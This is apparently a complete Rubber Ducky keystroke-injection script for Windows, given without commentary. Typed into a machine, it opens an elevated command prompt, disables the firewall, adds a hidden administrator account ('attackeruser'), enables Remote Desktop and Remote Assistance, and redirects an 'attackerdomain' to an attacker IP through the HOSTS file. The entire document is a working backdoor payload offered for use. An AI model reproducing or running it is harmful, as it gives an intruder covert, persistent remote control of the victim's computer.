WINDOWS q
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 300
RIGHTARROW
DELAY 300
RIGHTARROW
DELAY 300
RIGHTARROW
DELAY 300
ENTER
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING net user attackeruser attackerpass /add && net localgroup administrators attackeruser /add
ENTER
DELAY 200
STRING y
ENTER
DELAY 400
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v attackeruser /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING ECHO attackerip attackerdomain >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING ECHO attackerip www.attackerdomain >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING exit
ENTER
